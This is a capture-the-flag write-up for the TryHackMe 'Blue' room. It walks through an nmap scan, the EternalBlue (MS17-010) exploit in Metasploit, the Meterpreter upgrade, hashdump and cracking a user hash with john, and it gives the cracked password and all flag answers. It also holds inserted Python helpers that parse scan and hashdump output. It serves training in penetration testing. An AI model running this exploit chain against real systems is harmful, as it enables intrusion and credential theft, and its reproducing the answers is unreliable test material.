TryHackME – Blue Writeup

In this TryHackME - Blue writeup we will learn how a single unpatched service can get a whole system compromised. The purpose of this blog is to walk through the steps needed to complete the Blue room: deploy and hack into a Windows machine by leveraging a common misconfiguration issue.

TryHackME - Blue Task 1: Recon

This is the information-gathering phase, in which we collect details about open ports, running services, the operating system, and their versions.

Question 1: How many ports are open with a port number under 1000?

Solution: Step 1: Run the ‘nmap’ tool against the target IP to identify the open ports under 1000.

And I found 3 open ports under 1000.

Answer -- 3

Question 2: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Solution: Step 1: Run Nmap's vuln script against the target to find the vulnerability.

It is vulnerable to ‘SMBv1 server ms17-010’.

Answer -- ms17-010
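The two recon questions above are both answered by reading the scan output carefully. As an added example (not part of the original writeup), the Python below parses nmap's normal output the way a defender doing an exposure review would: it counts open ports below a threshold and pulls out every NSE script block whose state is VULNERABLE. The embedded scan text is a constructed sample shaped like `nmap -sV --script vuln` output, not a capture from the room, and the service banners in it are illustrative.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample in the shape of nmap "normal" output for a scan like
# `nmap -sV --script vuln <target>`; it is not a capture from the room.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.140.190
Host is up (0.045s latency).
Not shown: 991 closed ports
PORT      STATE    SERVICE       VERSION
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds
3389/tcp  open     ms-wbt-server
49152/tcp open     msrpc         Microsoft Windows RPC
49153/tcp filtered msrpc

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    Risk factor: HIGH
|_smb-vuln-ms10-054: false
"""

# A port line starts with "<port>/<proto>" followed by state and service name.
PORT_LINE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")
# An NSE script header is "| name:" or "|_name:" with at most one space after the bar;
# indented detail lines inside a block have more spaces and therefore do not match.
SCRIPT_HEADER = re.compile(r"^\|_? ?(?P<script>[a-z][\w-]*):")
VULN_STATE = re.compile(r"State:\s*VULNERABLE")


@dataclass(frozen=True)
class PortEntry:
    port: int
    proto: str
    state: str
    service: str


def parse_ports(text: str) -> list[PortEntry]:
    """Extract every port line (open, filtered, ...) from nmap normal output."""
    entries = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            entries.append(PortEntry(int(m["port"]), m["proto"], m["state"], m["service"]))
    return entries


def count_open_ports_below(entries: list[PortEntry], limit: int = 1000) -> int:
    """Task 1, question 1: how many open ports have a number below `limit`."""
    return sum(1 for e in entries if e.state == "open" and e.port < limit)


def vulnerable_scripts(text: str) -> list[str]:
    """Task 1, question 2: names of NSE scripts whose block reports 'State: VULNERABLE'."""
    found: list[str] = []
    current = None
    for line in text.splitlines():
        header = SCRIPT_HEADER.match(line)
        if header:
            current = header["script"]
        elif current and VULN_STATE.search(line) and current not in found:
            found.append(current)
    return found


if __name__ == "__main__":
    ports = parse_ports(SAMPLE_NMAP_OUTPUT)
    print("open ports under 1000:", count_open_ports_below(ports))
    print("vulnerable per NSE:", vulnerable_scripts(SAMPLE_NMAP_OUTPUT))
```

Feed it the saved output of your own scan (`nmap ... -oN scan.txt`) and the same two functions give you the port count and the list of scripts that fired, which is also a convenient way to diff an exposure before and after the patch is applied.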

TryHackME - Blue Task 2: Gain Access

This machine is vulnerable to ms17-010, a remote code execution vulnerability. Use Metasploit to exploit it.

Question 1: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)

Solution:

Step 1: Open Metasploit and search for an exploit for ‘SMBv1 server ms17-010’ using the “search ms17-010” command.

I found these 4 exploits.

Step 2: Now I use the first exploit.

exploit/windows/smb/ms17_010_eternalblue

Answer --exploit/windows/smb/ms17_010_eternalblue

Question 2: Show options and set the one required value. What is the name of this value? (All caps for submission)

Step 1: Check the options with the “show options” command.

Step 2: Set rhosts to 10.10.140.190 (the target IP) and press Enter.

Answer --rhosts

Now it is time to run the exploit with the “run” command.

NOTE: If you see a FAIL message instead of a session, set lhost to 10.10.112.79 (your own IP) and press Enter.

After setting the correct lhost and rhosts, check again with the “show options” command to confirm them, then run the exploit again.

TryHackME - Blue Task 3: Escalate

After getting a shell, background it with Ctrl+Z and upgrade it to Meterpreter.

Question 1: If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in Metasploit. What is the name of the post-module we will use? (Exact path, similar to the exploit we previously selected)

Solution:

Step 1: Use the command “search shell_to”.

Step 2: Type the command “use 0” to select it.

post/multi/manage/shell_to_meterpreter

Answer --post/multi/manage/shell_to_meterpreter

Question 2: Select this (use MODULE_PATH). Show options, what option are we required to change?

Solution:

Step 1: Type the command “sessions” to check all the sessions I have.

Answer --Session

TryHackME - Blue Task 4: Cracking

In this task, we try to dump the hash of the user's password and crack it.

Question 1: Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Solution:

Step 1: Now it is time to get a shell/cmd prompt with the “shell” command.

Step 2: Now get the hashes with the “hashdump” command.

The only non-default user is Jon.

Answer -- jon
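Spotting the non-default account in hashdump output is a matter of reading the pwdump-style records (`user:RID:LM-hash:NT-hash:::`). The Python below is an added example, not part of the original writeup, that parses those records the way an account audit would: it separates built-in accounts from locally created ones, flags accounts whose NT hash is the well-known hash of the empty password, and flags accounts that still have an LM hash stored (a weak legacy format that should normally be absent). The sample dump and every hash value in it are constructed for the example, and the set of "default" account names is an assumption you should extend for your own environment.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Well-known constants: the LM field stored when no LM hash is kept, and the
# NT hash of the empty password (MD4 over the UTF-16LE encoding of "").
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Assumption: built-in account names to treat as "default"; extend as needed.
# Well-known RIDs below 1000 are also treated as built-in.
DEFAULT_ACCOUNTS = {"administrator", "guest", "defaultaccount", "wdagutilityaccount"}

# Constructed sample in the format hashdump prints (user:RID:LM:NT:::).
# The hash values are made up; a non-record line is included to show it is skipped.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:11111111111111111111111111111111:0123456789abcdef0123456789abcdef:::
this line is not a hash record
"""

HASH_LINE = re.compile(
    r"^(?P<name>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$"
)


@dataclass(frozen=True)
class Account:
    name: str
    rid: int
    lm_hash: str
    nt_hash: str

    @property
    def is_default(self) -> bool:
        return self.name.lower() in DEFAULT_ACCOUNTS or self.rid < 1000

    @property
    def blank_password(self) -> bool:
        return self.nt_hash == EMPTY_NT_HASH

    @property
    def lm_hash_stored(self) -> bool:
        return self.lm_hash != EMPTY_LM_HASH


def parse_hashdump(text: str) -> list[Account]:
    """Parse hashdump records, skipping any line that is not a well-formed record."""
    accounts = []
    for line in text.splitlines():
        m = HASH_LINE.match(line)
        if m:
            accounts.append(Account(m["name"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return accounts


def non_default_users(accounts: list[Account]) -> list[str]:
    """Task 4, question 1: locally created (non built-in) accounts."""
    return [a.name for a in accounts if not a.is_default]


def blank_password_accounts(accounts: list[Account]) -> list[str]:
    """Accounts whose NT hash equals the hash of the empty password."""
    return [a.name for a in accounts if a.blank_password]


def lm_hash_accounts(accounts: list[Account]) -> list[str]:
    """Accounts for which a legacy LM hash is still stored."""
    return [a.name for a in accounts if a.lm_hash_stored]


def audit(text: str) -> dict[str, list[str]]:
    """Run all three checks over raw hashdump text."""
    accounts = parse_hashdump(text)
    return {
        "non_default_users": non_default_users(accounts),
        "blank_password": blank_password_accounts(accounts),
        "lm_hash_stored": lm_hash_accounts(accounts),
    }


if __name__ == "__main__":
    for check, names in audit(SAMPLE_HASHDUMP).items():
        print(f"{check}: {names}")
```

The RID rule is what makes the "non-default" test general: Windows assigns RIDs starting at 1000 to accounts created after installation, so anything below that is a built-in regardless of what it has been renamed to.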

Question 2: Copy this password hash to a file and research how to crack it. What is the cracked password?

Solution:

Step 1: Now I save Jon's password hash in a file (jon.txt) and after that rename the file to jon.hash to decode the hash and get the original password.

Step 2: Crack the hash with the “john” tool and the “rockyou.txt” wordlist.

Answer -- alqfna22

TryHackME - Blue Task 5: Find flags!

Once you have a shell, you need to find the flags hidden in different directories of the target machine.

Question 1: Flag1? This flag can be found at the system root.

Solution:

Step 1: Check the hint and go to the C: drive.

Step 2: List the directory with the “dir” command. Then I see the flag1.txt file.

Step 3: Read the flag1.txt file with the “cat” command.

Flag 1: -- flag{access_the_machine}

Question 2: Flag2? This flag can be found at the location where passwords are stored within Windows.

Solution:

Step 1: Check the hint and go to the ‘Windows’ folder.

Step 2: Then go to the system32 folder with the “cd system32” command.

Step 3: Then go to the config folder.

List the directory and you will see flag2.txt.

Flag 2: -- flag{sam_database_elevated_access}

Question 3: flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

Solution:

Type the command: search -f flag*.txt

After that you will see the flag3.txt file; then read it.

Flag 3: -- flag{admin_documents_can_be_valuable}

Finally done.

NOTE: The EternalBlue vulnerability was very famous, and many systems were compromised using it. Microsoft released fixes to patch this vulnerability on the different affected operating systems.

Author:

Abhishek Sharma.
Cybersecurity Intern.
